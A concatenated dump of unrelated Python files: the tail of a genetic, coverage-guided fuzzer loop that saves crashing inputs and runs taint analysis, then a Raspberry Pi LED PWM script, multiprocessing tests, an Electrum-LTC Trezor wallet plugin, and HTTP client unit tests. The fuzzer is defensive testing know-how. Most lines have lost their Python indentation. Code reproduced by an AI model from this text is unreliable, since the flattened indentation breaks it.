#form_bitvector2(bbs,fl,config.BBFORPRUNE,config.SPECIALBITVECTORS)
if tbv not in config.SPECIAL_BITVECTOR:
config.SPECIAL_BITVECTOR.add(tbv)
shutil.copy(tfl, config.SPECIAL)
#config.SPECIAL_BITVECTOR_FL[fl] = tbv
if retc not in config.NON_CRASH_RET_CODES and (lava_code not in config.LAVA_CRASH or lava_code == 0):
config.LAVA_CRASH.add(lava_code)
efd.write("%s: %d\n"%(tfl, retc))
efd.flush()
                os.fsync(efd.fileno())
#tmpHash=sha1OfFile(config.CRASHFILE)
#if tmpHash not in crashHash:
#crashHash.append(tmpHash)
tnow=datetime.now().isoformat().replace(":","-")
nf="%s-%s.%s"%(progname,tnow,gau.splitFilename(fl)[1])
npath=os.path.join("outd/crashInputs",nf)
shutil.copyfile(tfl,npath)
if SPECIALADDED == False:
shutil.copy(tfl,config.SPECIAL)
config.CRASHIN.add(fl)
if config.STOPONCRASH == True:
#efd.close()
crashhappend=True
break
fitscore=[v for k,v in fitnes.items()]
maxfit=max(fitscore)
avefit=sum(fitscore)/len(fitscore)
mnlen,mxlen,avlen=gau.getFileMinMax(config.INPUTD)
print "[*] Done with all input in Gen, starting SPECIAL. \n"
appcov,allcov=gau.calculateCov()
tnow=datetime.now().isoformat().replace(":","-")
stat.write("\t%d\t %d\t %d\t %d\t %d\t %d\t %d\t %d\t %d\t %d\t %s\t %d\n"%(genran,min(fitscore),maxfit,avefit,mnlen,mxlen,avlen,len(config.SEENBB),appcov,allcov,tnow,len(config.CRASHIN)))
stat.flush()
os.fsync(stat.fileno())
print "[*] Wrote to stat.log\n"
if crashhappend == True:
break
#lets find out some of the error handling BBs
genran += 1
#this part is to get initial fitness that will be used to determine if fuzzer got stuck.
lastfit=currentfit
currentfit=len(config.SEENBB)
if currentfit==lastfit:#lastfit-config.FITMARGIN < currentfit < lastfit+config.FITMARGIN:
noprogress +=1
else:
noprogress =0
if noprogress > 20:
config.GOTSTUCK=True
stat.write("Heavy mutate happens now..\n")
noprogress =0
if (genran >= config.GENNUM) and (config.STOPOVERGENNUM == True):
break
if len(os.listdir(config.SPECIAL))>0 and SPECIALCHANGED == True:
if len(os.listdir(config.SPECIAL))<config.NEWTAINTFILES: #The # of new generated special TC is not big
get_taint(config.SPECIAL)
#print_func_exec()
else:
                #take only config.NEWTAINTFILES files from SPECIAL and perform taint analysis on them.
try:
os.mkdir(config.TAINTTMP)
except OSError:
gau.emptyDir(config.TAINTTMP)
if conditional_copy_files(config.SPECIAL,config.TAINTTMP,config.NEWTAINTFILES) == 0:
get_taint(config.TAINTTMP)
print "[*] Going for new generation creation.\n"
gau.createNextGeneration3(fitnes,genran)
efd.close()
stat.close()
libfd_mm.close()
libfd.close()
endtime=time.time()
    print "[**] Total time %f sec."%(endtime-config.START_TIME,)
print "[**] Fuzzing done. Check %s to see if there were crashes.."%(config.ERRORS,)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
main()
'''
fuzzthread = threading.Thread(target = main)
fuzzthread.start()
if config.FLASK:
socketio.run(app, host="0.0.0.0", port=5000)
'''
|
blink_pwm.py
|
'''
@author: Vikram Udyawer
@date: 25th March 2017 Saturday
@summary: PWM controlled RGB LED
@description:
Code for a Raspberry Pi to cycle an RGB LED
through its different colors using PWM.
'''
import RPi.GPIO as GPIO
import threading
import time
import random
R = 19
G = 20
B = 21
PINS = [R,G,B]
ROTATION_IN_MS = 750
def initializeGpio():
GPIO.setmode(GPIO.BCM)
GPIO.setup(PINS, GPIO.OUT, initial=GPIO.LOW)
def rgbTest(channel, frequency, speed, step):
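    # Fade this channel's PWM duty cycle up to 100% and back down forever, producing a pulsing colour.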
p = GPIO.PWM(channel, frequency)
p.start(0)
while True:
for dutyCycle in range(0, 101, step):
p.ChangeDutyCycle(dutyCycle)
time.sleep(speed)
for dutyCycle in range(100, -1, -step):
p.ChangeDutyCycle(dutyCycle)
time.sleep(speed)
def rgbThread():
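    # Run one fading thread per colour channel; the different speeds make the mixed colour drift over time.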
threads = []
threads.append(threading.Thread(target=rgbTest, args=(R, 300, 0.02, 50)))
threads.append(threading.Thread(target=rgbTest, args=(G, 300, 0.035, 50)))
threads.append(threading.Thread(target=rgbTest, args=(B, 300, 0.045, 50)))
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
def main():
try:
initializeGpio()
print("\nPress ^C (control-C) to exit the program.\n")
rgbThread()
except KeyboardInterrupt:
pass
finally:
GPIO.cleanup()
if __name__ == '__main__':
main()
|
mp_synchronize.py
|
#
# A test file for the `multiprocessing` package
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import time, sys, random
from queue import Empty
import multiprocessing # may get overwritten
#### TEST_VALUE
def value_func(running, mutex):
random.seed()
time.sleep(random.random()*4)
mutex.acquire()
print('\n\t\t\t' + str(multiprocessing.current_process()) + ' has finished')
running.value -= 1
mutex.release()
def test_value():
TASKS = 10
running = multiprocessing.Value('i', TASKS)
mutex = multiprocessing.Lock()
for i in range(TASKS):
p = multiprocessing.Process(target=value_func, args=(running, mutex))
p.start()
while running.value > 0:
time.sleep(0.08)
mutex.acquire()
print(running.value, end=' ')
sys.stdout.flush()
mutex.release()
print()
print('No more running processes')
#### TEST_QUEUE
def queue_func(queue):
for i in range(30):
time.sleep(0.5 * random.random())
queue.put(i*i)
queue.put('STOP')
def test_queue():
q = multiprocessing.Queue()
p = multiprocessing.Process(target=queue_func, args=(q,))
p.start()
o = None
while o != 'STOP':
try:
o = q.get(timeout=0.3)
print(o, end=' ')
sys.stdout.flush()
except Empty:
print('TIMEOUT')
print()
#### TEST_CONDITION
def condition_func(cond):
cond.acquire()
print('\t' + str(cond))
time.sleep(2)
print('\tchild is notifying')
print('\t' + str(cond))
cond.notify()
cond.release()
def test_condition():
cond = multiprocessing.Condition()
p = multiprocessing.Process(target=condition_func, args=(cond,))
print(cond)
cond.acquire()
print(cond)
cond.acquire()
print(cond)
p.start()
print('main is waiting')
cond.wait()
print('main has woken up')
print(cond)
cond.release()
print(cond)
cond.release()
p.join()
print(cond)
#### TEST_SEMAPHORE
def semaphore_func(sema, mutex, running):
sema.acquire()
mutex.acquire()
running.value += 1
print(running.value, 'tasks are running')
mutex.release()
random.seed()
time.sleep(random.random()*2)
mutex.acquire()
running.value -= 1
print('%s has finished' % multiprocessing.current_process())
mutex.release()
sema.release()
def test_semaphore():
sema = multiprocessing.Semaphore(3)
mutex = multiprocessing.RLock()
running = multiprocessing.Value('i', 0)
processes = [
multiprocessing.Process(target=semaphore_func,
args=(sema, mutex, running))
for i in range(10)
]
for p in processes:
p.start()
for p in processes:
p.join()
#### TEST_JOIN_TIMEOUT
def join_timeout_func():
print('\tchild sleeping')
time.sleep(5.5)
print('\n\tchild terminating')
def test_join_timeout():
p = multiprocessing.Process(target=join_timeout_func)
p.start()
print('waiting for process to finish')
while 1:
p.join(timeout=1)
if not p.is_alive():
break
print('.', end=' ')
sys.stdout.flush()
#### TEST_EVENT
def event_func(event):
print('\t%r is waiting' % multiprocessing.current_process())
event.wait()
print('\t%r has woken up' % multiprocessing.current_process())
def test_event():
event = multiprocessing.Event()
processes = [multiprocessing.Process(target=event_func, args=(event,))
for i in range(5)]
for p in processes:
p.start()
print('main is sleeping')
time.sleep(2)
print('main is setting event')
event.set()
for p in processes:
p.join()
#### TEST_SHAREDVALUES
def sharedvalues_func(values, arrays, shared_values, shared_arrays):
for i in range(len(values)):
v = values[i][1]
sv = shared_values[i].value
assert v == sv
for i in range(len(values)):
a = arrays[i][1]
sa = list(shared_arrays[i][:])
assert a == sa
print('Tests passed')
def test_sharedvalues():
values = [
('i', 10),
('h', -2),
('d', 1.25)
]
arrays = [
('i', list(range(100))),
('d', [0.25 * i for i in range(100)]),
('H', list(range(1000)))
]
shared_values = [multiprocessing.Value(id, v) for id, v in values]
shared_arrays = [multiprocessing.Array(id, a) for id, a in arrays]
p = multiprocessing.Process(
target=sharedvalues_func,
args=(values, arrays, shared_values, shared_arrays)
)
p.start()
p.join()
assert p.exitcode == 0
####
def test(namespace=multiprocessing):
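    # Rebind the global multiprocessing name to the given namespace (processes, manager proxies, or threads) and run every test with it.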
global multiprocessing
multiprocessing = namespace
for func in [ test_value, test_queue, test_condition,
test_semaphore, test_join_timeout, test_event,
test_sharedvalues ]:
print('\n\t######## %s\n' % func.__name__)
func()
ignore = multiprocessing.active_children() # cleanup any old processes
if hasattr(multiprocessing, '_debug_info'):
info = multiprocessing._debug_info()
if info:
print(info)
raise ValueError('there should be no positive refcounts left')
if __name__ == '__main__':
multiprocessing.freeze_support()
assert len(sys.argv) in (1, 2)
if len(sys.argv) == 1 or sys.argv[1] == 'processes':
print(' Using processes '.center(79, '-'))
namespace = multiprocessing
elif sys.argv[1] == 'manager':
print(' Using processes and a manager '.center(79, '-'))
namespace = multiprocessing.Manager()
namespace.Process = multiprocessing.Process
namespace.current_process = multiprocessing.current_process
namespace.active_children = multiprocessing.active_children
elif sys.argv[1] == 'threads':
print(' Using threads '.center(79, '-'))
import multiprocessing.dummy as namespace
else:
print('Usage:\n\t%s [processes | manager | threads]' % sys.argv[0])
raise SystemExit(2)
test(namespace)
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_ltc.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_ltc.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_ltc import constants
from electrum_ltc.i18n import _
from electrum_ltc.plugins import BasePlugin, Device
from electrum_ltc.transaction import deserialize, Transaction
from electrum_ltc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey, xtype_from_derivation
from electrum_ltc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_script_gen(self):
xtype = xtype_from_derivation(self.derivation)
if xtype in ('p2wpkh', 'p2wsh'):
return SCRIPT_GEN_NATIVE_SEGWIT
elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
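        # Gather the previous transactions and xpub derivation paths the device needs, then delegate to the plugin.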
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
# Minimal test if python-trezor is installed
import trezorlib
try:
library_version = trezorlib.__version__
except AttributeError:
# python-trezor only introduced __version__ in 0.9.0
library_version = 'unknown'
if library_version == 'unknown' or \
versiontuple(library_version) < self.minimum_library:
self.libraries_available_message = (
_("Library version for '{}' is too old.").format(name)
+ '\nInstalled: {}, Needed: {}'
.format(library_version, self.minimum_library))
self.print_stderr(self.libraries_available_message)
raise ImportError()
self.libraries_available = True
except ImportError:
self.libraries_available = False
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Litecoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, script_gen, is_multisig):
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
return self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
return self.types.InputScriptType.SPENDP2SHWITNESS
else:
if is_multisig:
return self.types.InputScriptType.SPENDMULTISIG
else:
return self.types.InputScriptType.SPENDADDRESS
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_gen = keystore.get_script_gen()
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
                prev_hash = b"\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False)
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1, 100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
                self.thread = threading.Thread(target=self.run_server)
                self.thread.start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP Get in the wild, these webservers are far less
forgiving'''
MyHTTPHandler.get = echo_path_get
